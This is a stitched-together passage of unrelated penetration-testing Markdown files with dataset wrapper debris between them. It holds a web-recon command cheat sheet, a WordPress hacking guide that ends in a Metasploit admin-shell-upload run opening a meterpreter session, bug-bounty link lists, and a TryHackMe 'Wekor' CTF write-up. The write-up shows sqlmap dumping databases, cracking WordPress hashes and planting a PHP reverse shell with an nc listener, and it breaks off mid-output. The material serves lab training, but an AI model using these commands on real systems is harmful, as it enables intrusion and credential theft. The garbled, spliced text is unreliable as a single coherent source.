Bypasser](#403-bypasser)\r\n - [Fuzzer](#fuzzer)\r\n - [Fuzz parameters - arjun](#fuzz-parameters---arjun)\r\n - [Wfuzz](#wfuzz)\r\n - [HeartBleed](#heartbleed)\r\n - [Proxy](#proxy)\r\n - [Zaproxy](#zaproxy)\r\n - [Check multiple page](#check-multiple-page)\r\n - [Detect WAF](#detect-waf)\r\n - [cURL](#curl)\r\n - [Security.txt](#securitytxt)\r\n - [Index page](#index-page)\r\n - [Discovery - Favicon](#discovery---favicon)\r\n - [OSINT](#osint)\r\n - [Google dorks](#google-dorks)\r\n - [Wayback Machine](#wayback-machine)\r\n\r\n## Nmap\r\n\r\n```sh\r\nnmap -p 80 -vv --script=http-enum.nse,http-methods.nse,http-majordomo2-dir-traversal.nse,http-auth.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-put.nse,http-apache-negotiation.nse,http-adobe-coldfusion-apsa1301.nse TARGET_IP\r\n```\r\n\r\n## Scan for cms\r\n\r\n> Cmsmap\r\n\r\nCMSmap is a CMS scanner that automates the process of detecting security flaws of the most popular CMSs.\r\n\r\n```sh\r\ncmsmap http://TARGET_IP:PORT\r\n```\r\n\r\n> Wpscan\r\n\r\nThe WPScan CLI tool is a black box WordPress security scanner\r\n\r\n```sh\r\nwpscan --url http://TARGET_IP:PORT\r\n```\r\n\r\n> Nikto\r\n\r\nNikto is an web server scanner which performs comprehensive tests against web servers for multiple\r\n\r\n```sh\r\nnikto -h http://TARGET_IP:PORT\r\n```\r\n\r\n> chameleon\r\n\r\n```sh\r\nchameleon --url http://TARGET_IP:PORT\r\n```\r\n\r\n> Whatweb\r\n\r\nWhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.\r\n\r\n```sh\r\nwhatweb -v -a 3 http://TARGET_IP:PORT\r\n```\r\n\r\n## WebSite Scanning\r\n\r\n### Dico list\r\n\r\n> Common\r\n\r\n```list\r\n/usr/share/dirbuster/wordlists/common.txt - Size 13 KiB\r\n/usr/share/skipfish/dictionaries/complete.wl - Size 34 KiB\r\n/usr/share/seclists/Discovery/Web-Content/common.txt - Size 36 KiB\r\n```\r\n\r\n> Directory\r\n\r\n```list\r\n/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt - Size 244 KiB\r\n/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt - Size 2 MiB\r\n/usr/share/dirbuster/wordlists/directory-list-2.3-big.txt - Size 15 MiB\r\n```\r\n\r\n> File\r\n\r\n```list\r\n/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt - 219 KiB\r\n/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt - 481 KiB\r\n```\r\n\r\n> Fuzz extension\r\n\r\n```list\r\n/usr/share/seclists/Discovery/Web-Content/web-extensions.txt - Size 206 B\r\n/usr/share/skipfish/dictionaries/extensions-only.wl - Size 1 KiB\r\n/usr/share/seclists/Discovery/Web-Content/raft-small-extensions.txt - Size 7 KiB\r\n```\r\n\r\n> Server Based\r\n\r\n```list\r\n/usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt - Size 4 KiB\r\n/usr/share/seclists/Discovery/Web-Content/tomcat.txt - Size 2 KiB\r\n/usr/share/seclists/Discovery/Web-Content/nginx.txt - Size 559 B\r\n/usr/share/seclists/Discovery/Web-Content/apache.txt - Size 238 B\r\n```\r\n\r\n> Vhost\r\n\r\n```list\r\n/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt - Size 32 KiB\r\n```\r\n\r\n> Parameters\r\n\r\n```list\r\n/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt - Size 18 KiB\r\n```\r\n\r\n### Commands\r\n\r\n> Skipfish\r\n\r\n```sh\r\nskipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -u http://TARGET_IP:Port\r\n```\r\n\r\n> Dirsearch\r\n\r\n```sh\r\ndirsearch -u http://TARGET_IP:Port -e php,asp\r\n```\r\n\r\n> Gobuster\r\n\r\n```sh\r\ngobuster dir -t 10 -x .php,.html -e -s 200,204,301,302,307 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://TARGET_IP:Port\r\n```\r\n\r\n> feroxbuster\r\n\r\n```sh\r\nferoxbuster --url http://TARGET_IP:Port --depth 2\r\n```\r\n\r\n> Dirhunt\r\n\r\nDirhunt is a web crawler optimize for search and analyze directories. This tool can find interesting things if the server has the \"index of\" mode enabled.\r\n\r\n```sh\r\ndirhunt http://TARGET_IP:Port\r\n```\r\n\r\n### Check for backup files\r\n\r\nSource: \r\n\r\n```sh\r\nbfac -u http://TARGET_IP:Port\r\n```\r\n\r\n> Exclude status-codes\r\n\r\n```sh\r\nbfac -u http://TARGET_IP:Port --exclude-status-codes 301,999\r\n```\r\n\r\n> Random user agent\r\n\r\n```sh\r\nbfac -u http://TARGET_IP:Port -ra\r\n```\r\n\r\n## 403 Bypasser\r\n\r\n```sh\r\n403bypasser.py -u http://TARGET_IP:Port -d /DIRECTORY\r\n403bypasser.py -u http://TARGET_IP:Port -D dirlist.txt\r\n```\r\n\r\n## Fuzzer\r\n\r\n### Fuzz parameters - arjun\r\n\r\n```sh\r\narjun -u http://TARGET_IP:Port\r\n```\r\n\r\n> Custom dico\r\n\r\n```sh\r\narjun -u http://TARGET_IP:Port -f /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt\r\n```\r\n\r\n### Wfuzz\r\n\r\n```sh\r\nwfuzz -c -z file,'/usr/share/wfuzz/wordlist/Injections/All_attack.txt' http://TARGET_IP:Port/index.php?page=FUZZ\r\n```\r\n\r\n> If site in https\r\n\r\n```sh\r\nffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://TARGET_IP:PORT/index.php?page=FUZZ\r\n```\r\n\r\n## HeartBleed\r\n\r\n```sh\r\nsslscan TARGET_IP\r\n```\r\n\r\n```sh\r\ntestssl TARGET_IP\r\n```\r\n\r\n```sh\r\nopenssl s_client -connect TARGET_IP:443\r\n```\r\n\r\n### Proxy\r\n\r\n```sh\r\nBurp\r\n```\r\n\r\n## Zaproxy\r\n\r\n```sh\r\nzaproxy\r\n```\r\n\r\n## Check multiple page\r\n\r\nThe file hosts has multiple different url :\r\n www.test.com www.google.com ...\r\n\r\n```sh\r\ncat hosts |aquatone\r\n```\r\n\r\n## Detect WAF\r\n\r\n> nmap\r\n\r\n```sh\r\nnmap -p80 --script http-waf-detect TARGET_IP\r\n```\r\n\r\n> wafw00f\r\n\r\n```sh\r\nwafw00f http://TARGET_IP\r\nwafw00f https://TARGET_IP -v\r\n```\r\n\r\n## cURL\r\n\r\n> File upload with cURL\r\n\r\n```bash\r\ncurl -X PUT -d @FILE_TO_UPLOAD.txt http://TARGET_IP/FILE_TO_UPLOAD.txt -vv\r\n```\r\n\r\n> json\r\n\r\n```bash\r\ncurl http://TARGET_IP -H 'Content-Type: application/json' -d '{ \"username\" : \"root\", \"password\" : \"root\" }'\r\n```\r\n\r\n> Cookie file\r\n\r\n```bash\r\ncurl --cookie-jar cookies.txt http://TARGET_IP\r\n```\r\n\r\n> Follow redirection\r\n\r\n```bash\r\ncurl -L http://TARGET_IP\r\n```\r\n\r\n> Only show the header\r\n\r\n```bash\r\n\r\ncurl -I http://TARGET_IP\r\n```\r\n\r\n## Security.txt\r\n\r\nThis file is used to tell security researchers how they can disclose vulnerabilities for a website. \r\n\r\n> Path\r\n\r\n```url\r\nhttp://IP_ADDRESS/.well-known/security.txt\r\n```\r\n\r\n> Link\r\n\r\n```url\r\nhttps://securitytxt.org\r\n```\r\n\r\n## Index page\r\n\r\n```url\r\nhttp://IP_ADDRESS/robots.txt\r\nhttp://IP_ADDRESS/sitemap.xml\r\nhttp://IP_ADDRESS/crossdomain.xml\r\nhttp://IP_ADDRESS/clientaccesspolicy.xml\r\n```\r\n\r\n## Discovery - Favicon\r\n\r\n> Favicon database\r\n\r\n\r\n\r\n> Get the favicon hash\r\n\r\n```bash\r\ncurl http://IP_ADDRESS/favicon.ico | md5sum\r\n```\r\n\r\n## OSINT\r\n\r\n### Google dorks\r\n\r\n| Filter | Example | Description |\r\n| :------- | :----------------- | :----------------------------------------------------------- |\r\n| site | site:tryhackme.com | returns results only from the specified website address |\r\n| inurl | inurl:admin | returns results that have the specified word in the URL |\r\n| filetype | filetype:pdf | returns results which are a particular file extension |\r\n| intitle | intitle:admin | returns results that contain the specified word in the title |\r\n\r\nMore info: \r\n\r\n### Wayback Machine\r\n\r\n\r\n"}}},{"rowIdx":309,"cells":{"text":{"kind":"string","value":"# 🔥Hacking-Wordpress 🔥\n![wordpress-hacking](https://user-images.githubusercontent.com/79256105/165776319-f7d73fb8-6bd9-4847-97da-461b641fbfe0.png)\n\n# Basic Wordpress and Wordpress Structure\n### 🔥Wordpress Structure 🔥\n\nWordPress can be installed on a Windows, Linux, or Mac OSX host. For this module, we will focus on a default WordPress installation on an Ubuntu Linux web server. WordPress requires a fully installed and configured LAMP stack (Linux operating system, Apache HTTP Server, MySQL database, and the PHP programming language) before installation on a Linux host. After installation, all WordPress supporting files and directories will be accessible in the webroot located at /var/www/html.\n\nBelow is the directory structure of a default WordPress install, showing the key files and subdirectories necessary for the website to function properly.\n\n\n tree -L 1 /var/www/html\n\n ├── index.php\n ├── license.txt\n ├── readme.html\n ├── wp-activate.php\n ├── wp-admin\n ├── wp-blog-header.php\n ├── wp-comments-post.php\n ├── wp-config.php\n ├── wp-config-sample.php\n ├── wp-content\n ├── wp-cron.php\n ├── wp-includes\n ├── wp-links-opml.php\n ├── wp-load.php\n ├── wp-login.php\n ├── wp-mail.php\n ├── wp-settings.php\n ├── wp-signup.php\n ├── wp-trackback.php\n └── xmlrpc.php\n\n## 👽 Key WordPress Files ♀️\n\nThe root directory of WordPress contains files that are needed to configure WordPress to function correctly.\n\n index.php is the homepage of WordPress.\n\n license.txt contains useful information such as the version WordPress installed.\n\n wp-activate.php is used for the email activation process when setting up a new WordPress site.\n\n wp-admin folder contains the login page for administrator access and the backend dashboard. Once a user has logged in, they can make changes to the site based on their assigned permissions. The login page can be located at one of the following paths:\n /wp-admin/login.php\n /wp-admin/wp-login.php\n /login.php\n /wp-login.php\n\nThis file can also be renamed to make it more challenging to find the login page.\n\n xmlrpc.php is a file representing a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.\nWordPress Configuration File\n## WordPress Configuration File\n The wp-config.php file contains information required by WordPress to connect to the database, such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.\nwp-config.php\n\n\n Code: php\n\n */\n /** The name of the database for WordPress */\n define( 'DB_NAME', 'database_name_here' );\n\n /** MySQL database username */\n define( 'DB_USER', 'username_here' );\n\n /** MySQL database password */\n define( 'DB_PASSWORD', 'password_here' );\n\n /** MySQL hostname */\n define( 'DB_HOST', 'localhost' );\n\n /** Authentication Unique Keys and Salts */\n /* */\n define( 'AUTH_KEY', 'put your unique phrase here' );\n define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );\n define( 'LOGGED_IN_KEY', 'put your unique phrase here' );\n define( 'NONCE_KEY', 'put your unique phrase here' );\n define( 'AUTH_SALT', 'put your unique phrase here' );\n define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );\n define( 'LOGGED_IN_SALT', 'put your unique phrase here' );\n define( 'NONCE_SALT', 'put your unique phrase here' );\n\n /** WordPress Database Table prefix */\n $table_prefix = 'wp_';\n\n /** For developers: WordPress debugging mode. */\n /** */\n define( 'WP_DEBUG', false );\n\n /** Absolute path to the WordPress directory. */\n if ( ! defined( 'ABSPATH' ) ) {\n define( 'ABSPATH', __DIR__ . '/' );\n }\n\n /** Sets up WordPress vars and included files. */\n require_once ABSPATH . 'wp-settings.php';\n\n# Key WordPress Directories\nThe wp-content folder is the main directory where plugins and themes are stored. The subdirectory uploads/ is usually where any files uploaded to the platform are stored. These directories and files should be carefully enumerated as they may lead to contain sensitive data that could lead to remote code execution or exploitation of other vulnerabilities or misconfigurations.\n \n#### WP-Content\n\n tree -L 1 /var/www/html/wp-content\n\n ├── index.php\n ├── plugins\n └── themes\n \n#### WP-Includes\n\nwp-includes contains everything except for the administrative components and the themes that belong to the website. This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.\n\n \n tree -L 1 /var/www/html/wp-includes\n\n ├── theme.php\n ├── update.php\n ├── user.php\n ├── vars.php\n ├── version.php\n ├── widgets\n ├── widgets.php\n ├── wlwmanifest.xml\n ├── wp-db.php\n └── wp-diff.php\n \n \n# WordPress User Roles \n\nThere are five types of users in a standard WordPress installation.\n\n Role \t Description\n Administrator \tThis user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.\n Editor \t An editor can publish and manage posts, including the posts of other users.\n Author \t Authors can publish and manage their own posts.\n Contributor \tThese users can write and manage their own posts but cannot publish them.\n Subscriber \tThese are normal users who can browse posts and edit their profiles.\n\n\nGaining access as an administrator is usually needed to obtain code execution on the server. However, editors and authors might have access to certain vulnerable plugins that normal users do not.\n \n \n# 🥇Enumeration Procedure For Wordpress Website in Manually\n\n### Wordpress Version Check\n\nCheck Wordpress Version using given below curl command or seeing source code\n\n commnad:\n curl -s -X GET http://blog.inlanefreight.com | grep ' search wp_admin\n\n###### Matching Modules\n\n0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload\n###### Module Selection:\nmsf5 > use 0\n\nmsf5 exploit(unix/webapp/wp_admin_shell_upload) >\n\n###### Module Options\n \n msf5 exploit(unix/webapp/wp_admin_shell_upload) > options\n\n##### Module options (exploit/unix/webapp/wp_admin_shell_upload):\n\n\n PASSWORD yes The WordPress password to authenticate with\n Proxies no A proxy chain of format type:host:port[,type:host:port][...]\n RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'\n RPORT 80 yes The target port (TCP)\n SSL false no Negotiate SSL/TLS for outgoing connections\n TARGETURI / yes The base path to the wordpress application\n USERNAME yes The WordPress username to authenticate with\n VHOST no HTTP server virtual host\n\n\nExploit target:\n\n Id Name\n -- ----\n 0 WordPress\n \n#### set and Exploitation\n \n msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.com\n msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin\n msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password Winter2020\n msf5 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.16.8\n msf5 exploit(unix/webapp/wp_admin_shell_upload) > run\n\nmeterpreter > getuid\nServer username: www—data (33)\n## 🙏Practicing Sites:\n https://tryhackme.com/room/allinonemj\n https://tryhackme.com/room/wordpresscve202129447\n https://tryhackme.com/room/blog\n \n## 🎆 Website Security Testing Site:\n https://sitecheck.sucuri.net/\n \n## 💠 Happy Hackings 🔡\n\n## ℹ️ Source: Hack The Box Accademy and Try Hack Me 🔽\n"}}},{"rowIdx":310,"cells":{"text":{"kind":"string","value":"# SetupHelpDesk(Under Development)\n\nIndex | Contents \n--- | ---\nResetHAcker | [HAcker Daily Utility and OSINT](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/HackersUtilities.md)\nCrhuber | [Linix Cheetsheet ](https://github.com/crhuber/linux-cheatsheet)\n0xblackbird - Developer Tools | [Developer Tools for bugbounty hunters](https://0xblackbird.github.io/blog/post4)\nHakluke | [How-to-exit-vim](https://github.com/hakluke/how-to-exit-vim)\nNahamsec - Recon_profile | [Create easy aliases to run via an SSH/terminal.](https://github.com/nahamsec/recon_profile)\nNahamsec - BugBounty Tookit| [BBHT is a script to install the most popular tools](https://github.com/nahamsec/bbht)\nAseem Shrey - Bug bounty Setups in any VPS | [Quick script to install and setups Setup Bug Bounty Tools on AWS instance / any VPS for that matter](https://gist.github.com/LuD1161/66f30da6d8b6c1c05b9f6708525ea885)\nHackerSploit - Docker for Bug Hunters | [Docker For Pentesting & Bug Bounty Hunting](https://www.youtube.com/watch?v=rfXadJ72dhg)\nPhoenixnap - Hyper-V for Bug Hunters |[Hyper-v configuration and install ubuntu](https://phoenixnap.com/kb/hyper-v-ubuntu)\nVikram - BB_Setup in Windows(WSL2) | [Bug bounty setup in Window 10 & 11 with WSL2 ](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/BB_Setup%20in%20WSL2)\nVikram - Burpsuite Setup and useses | [Penetration Testing with Burp (ft.: Raj chandel's blog and @Ignitetechnologies)](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md)\nUpdating - Pentesting setup in VM machine\nUpdating - Pentesting setup in VMware\n\n-------------------------------------------------------------------------------------------------------------------------------------------------------------\n\nIndex | Contents \n--- | ---\nSleeplessbeastie's Notes | [Install CouchDB](https://sleeplessbeastie.eu/2020/03/20/how-to-install-couchdb/)\nRaj Chandel - Cloud Computing Setup | [Penetration Testing Lab Setup: Apache2, MariaDB Server,PHP and its modules, Create OwnCloud Database setup and configuration using Ubuntu, docker and VM](https://www.hackingarticles.in/penetration-testing-lab-setupcloud-computing/)\nRaj Chandel - Web Server Lab Setup | [Penetration Testing Lab Setup: Apache, PHP, MySQL, phpMyAdmin setup and configuration using Ubuntu, docker and VM](https://www.hackingarticles.in/web-server-lab-setup-for-penetration-testing/)\nJayson Grace - GCP Setups | [DevSecOps lab SetUp:Install gcloud on MacOS & Ubuntu](https://techvomit.net/gcp-cheatsheet/)\nJayson Grace - AZURE Setups | [DevSecOps lab SetUp:Install AZURE CLI on MacOS & Linux](https://techvomit.net/azure-cheatsheet/)\nJayson Grace - Elasticsearch Setup | [DevSecOps lab SetUp:Install Elasticsearch - a search engine based on the Lucene library.](https://techvomit.net/elk/)\nRaj Chandel - Jenkin Steup | [DevSecOps Lab Setup:Install Java and setup Jenkin in Ubuntu](https://www.hackingarticles.in/penetration-testing-lab-setup-jenkins/)\nJayson Grace - Password Managers Setups | [DevSecOps Lab Setup:Install Keeper CLI client & LastPass](https://techvomit.net/password-managers/)\nJayson Grace - Terraform Setup | [DevSecOps Lab Setup:Install Terraform on Ubuntu 20.04](https://techvomit.net/terraform-cheatsheet/)\nRaj Chandel - Apache Tomcat setup | [Penetration Testing Lab Setup:Tomcat on any Linux Machine](https://www.hackingarticles.in/penetration-testing-lab-setuptomcat/)\nRaj Chandel - Memcached lab setup | [Penetration Testing Lab Setup: pen-testing in Memcached (Ubuntu 18.04.) ](https://www.hackingarticles.in/penetration-testing-lab-setup-memcached/)\nRaj Chandel - Web Proxy Lab Setup Testing using Squid | [Penetration Testing Lab Setup: Squid Proxy](https://www.hackingarticles.in/penetration-testing-lab-setup-squid-proxy/))\nRaj Chandel - Microsocks Lab setup | [Penetration Testing Lab Setup: Microsocks](https://www.hackingarticles.in/penetration-testing-lab-setup-microsocks/)\nRaj Chandel - telnetd Setup & configure | [Penetration Testing on Telnet (Port 23)](https://www.hackingarticles.in/penetration-testing-lab-setuptomcat/)\n\n-------------------------------------------------------------------------------------------------------------------------------------------------------------\nIndex | Policy , Guide, benchmarks etc Contents \n--- | ---\nConsortium for Educational Communication(CEC) | [Cyber Laws in India -](https://www.youtube.com/watch?v=Vbqi0z_48bA)\nEdoverflow | [A Deeper Look at Hacking Laws - video ](https://www.youtube.com/watch?v=Q5kIdpPIVuY)\nPhilippe Lagadec - security hardening guides | [A collection of awesome security hardening guides, best practices, checklists, benchmarks, tools and other resources.](https://github.com/decalage2/awesome-security-hardening)\n\n"}}},{"rowIdx":311,"cells":{"text":{"kind":"string","value":"# tips\n顾名思义,收集国内外各大佬的奇淫技巧\n\n1. [bugbountytips.me](http://bugbountytips.me/)\n>> github url: https://github.com/gwen001/bugbountytips\n\n2. [mark-zh/BugBountyTips](https://github.com/mark-zh/BugBountyTips)\n\n3. [KingOfBugbounty/KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips)\n\n4. [dwisiswant0/awesome-oneliner-bugbounty](https://github.com/dwisiswant0/awesome-oneliner-bugbounty)\n\n5. [devanshbatham/Awesome-Bugbounty-Writeups](https://github.com/devanshbatham/Awesome-Bugbounty-Writeups)\n\n6. [hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons)\n\n7. [punishell/bbtips](https://github.com/punishell/bbtips)\n\n8. [Neelakandan-A/BugBounty_CheatSheet](https://github.com/Neelakandan-A/BugBounty_CheatSheet)\n\n9. [giteshnxtlvl/YourNextBugTip](https://github.com/giteshnxtlvl/YourNextBugTip)\n\n10. [MD15/AllAboutBugBounty](https://github.com/MD15/AllAboutBugBounty)\n\n11. [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)\n"}}},{"rowIdx":312,"cells":{"text":{"kind":"string","value":"# Wekor\n\nCTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;)\n\nHey Everyone! This Box is just a little CTF I've prepared recently. I hope you enjoy it as it is my first time ever creating something like this !\n\nThis CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine.\n\nFeel free to ask any questions...It's okay to be confused in some parts of the box ;)\n\nJust a quick note, Please use the domain `wekor.thm` as it could be useful later on in the box ;)\n\n# User flag\n\n## Nmap scan\n\nLet's add the domain, as instructed:\n\n~~~\n┌──(kali㉿kali)-[/data/Wekor]\n└─$ echo \"10.10.207.93 wekor.thm\" | sudo tee -a /etc/hosts\n[sudo] password for kali: \n10.10.207.93 wekor.thm\n~~~\n\nNmap reveals 2 open ports:\n\n~~~\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)\n| 256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)\n|_ 256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-robots.txt: 9 disallowed entries \n| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot \n|_/comingreallysoon /interesting\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Site doesn't have a title (text/html).\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n~~~\n\n## Robots.txt\n\nStarting with the web port, the `robots.txt` file reveals several locations:\n\n~~~\nUser-agent: *\nDisallow: /workshop/\nDisallow: /root/\nDisallow: /lol/\nDisallow: /agent/\nDisallow: /feed\nDisallow: /crawler\nDisallow: /boot\nDisallow: /comingreallysoon\nDisallow: /interesting\n~~~\n\nMost of the locations lead to 404 errors, but 1:\n\n~~~\n┌──(kali㉿kali)-[/data/Wekor]\n└─$ for i in `curl -s http://wekor.thm/robots.txt | grep Disallow | cut -d \" \" -f2`;do echo $i;curl -I http://wekor.thm$i;echo \"---\";done\n/workshop/\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:13 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/root/\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:13 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/lol/\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:13 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/agent/\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:13 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/feed\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:13 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/crawler\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:14 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/boot\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:14 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/comingreallysoon\nHTTP/1.1 301 Moved Permanently\nDate: Tue, 11 May 2021 16:27:14 GMT\nServer: Apache/2.4.18 (Ubuntu)\nLocation: http://wekor.thm/comingreallysoon/\nContent-Type: text/html; charset=iso-8859-1\n\n---\n/interesting\nHTTP/1.1 404 Not Found\nDate: Tue, 11 May 2021 16:27:14 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Type: text/html; charset=iso-8859-1\n\n~~~\n\nBrowsing `http://wekor.thm/comingreallysoon/` discloses a new location: `/it-next`:\n\n~~~\n┌──(kali㉿kali)-[/data/Wekor]\n└─$ curl -s http://wekor.thm/comingreallysoon/\nWelcome Dear Client!\n\nWe've setup our latest website on /it-next, Please go check it out!\n\nIf you have any comments or suggestions, please tweet them to @faketwitteraccount!\n\nThanks a lot !\n~~~\n\n## SQL Injection\n\nThere are many pages in this website. Checking all pages where forms are available led me to a SQL injection vulnerability in the `it_cart.php` page. Intercept the page with BurpSuite, save the POST request as `ìt_cart_coupon.xml` and use `sqlmap` to dump the database:\n\n~~~\n$ sqlmap -r it_cart_coupon.xml --dump-all --threads=10\n~~~\n\nSQLmap has dumped 2 interesting databases: `coupons` and `worpress`:\n\n~~~\n┌──(kali㉿kali)-[~/…/sqlmap/output/wekor.thm/dump]\n└─$ ll\ntotal 24\ndrwxr-xr-x 2 kali kali 4096 May 11 19:45 coupons\ndrwxr-xr-x 2 kali kali 4096 May 11 19:45 information_schema\ndrwxr-xr-x 2 kali kali 4096 May 11 19:46 mysql\ndrwxr-xr-x 2 kali kali 4096 May 11 19:47 performance_schema\ndrwxr-xr-x 2 kali kali 4096 May 11 19:49 sys\ndrwxr-xr-x 2 kali kali 4096 May 11 19:49 wordpress\n~~~\n\nList of tables in the `wordpress` database:\n\n~~~ \n┌──(kali㉿kali)-[~/…/sqlmap/output/wekor.thm/dump]\n└─$ tree wordpress \nwordpress\n├── option_value-36999631.bin\n├── post_content-15186792.bin\n├── wp_comments.csv\n├── wp_options.csv\n├── wp_postmeta.csv\n├── wp_posts.csv\n├── wp_term_relationships.csv\n├── wp_terms.csv\n├── wp_term_taxonomy.csv\n├── wp_usermeta.csv\n└── wp_users.csv\n~~~\n\nWordpress Users:\n\n~~~\n┌──(kali㉿kali)-[~/…/output/wekor.thm/dump/wordpress]\n└─$ cat wp_users.csv \nID,user_url,user_pass,user_email,user_login,user_status,display_name,user_nicename,user_registered,user_activation_key\n1,http://site.wekor.thm/wordpress,$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.,admin@wekor.thm,admin,0,admin,admin,2021-01-21 20:33:37,\n5743,http://jeffrey.com,$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10,jeffrey@wekor.thm,wp_jeffrey,0,wp jeffrey,wp_jeffrey,2021-01-21 20:34:50,1611261290:$P$BufzJsT0fhM94swehg1bpDVTupoxPE0\n5773,http://yura.com,$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/,yura@wekor.thm,wp_yura,0,wp yura,wp_yura,2021-01-21 20:35:27,\n5873,http://eagle.com,$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/,eagle@wekor.thm,wp_eagle,0,wp eagle,wp_eagle,2021-01-21 20:36:11,\n~~~\n\nThere is an interesting information associated to the admin account: `http://site.wekor.thm/wordpress` may be the URL to Wordpress.\n\n## Wordpress credentials\n\nAll user accounts but admin have been cracked:\n\n~~~\n┌──(kali㉿kali)-[/data/Wekor/files]\n└─$ /data/src/john/run/john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 1 ⚙\nUsing default input encoding: UTF-8\nLoaded 4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nrockyou (wp_jeffrey)\nxxxxxx (wp_eagle)\nsoccer13 (wp_yura)\nUse the \"--show --format=phpass\" options to display all of the cracked passwords reliably\nSession completed\n~~~\n\n## Wordpress\n\nLet's add the new virtualhost:\n\n~~~\n$ echo \"10.10.207.93 site.wekor.thm\" | sudo tee -a /etc/hosts\n~~~\n\nNow, browsing http://site.wekor.thm/wordpress leads to a Wordpress installation. we immediately jump to http://site.wekor.thm/wordpress/wp-admin/ and try the credentials found previously. Trying the 3 accounts reveals that `wp_yura` is actually granted administrator privileges\n\n* `admin`: Administrator, but we haven't been able to crack the password\n* `wp_eagle`: Subscriber\n* `wp_jeffrey`: Subscriber\n* `wp_yura`: Administrator\n\n## Reverse Shell\n\nNow that we are logged in with admin privileges, go to \"Appearance > Theme Editor\", and edit the `404.php` template page to replace its content with a PHP reverse shell. Start a listener (`nc -nlvp 4444`) and browse http://site.wekor.thm/wordpress/wp-content/themes/twentytwentyone/404.php. We now have a reverse shell.\n\n## Lateral move (www-data -> Orka)\n\nRunning linpeas.sh will reveal several services running for localhost only, 1 of which on port 11211.\n\n~~~\n[+] Active Ports\n[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports\ntcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - \ntcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN - \ntcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - \ntcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - \ntcp 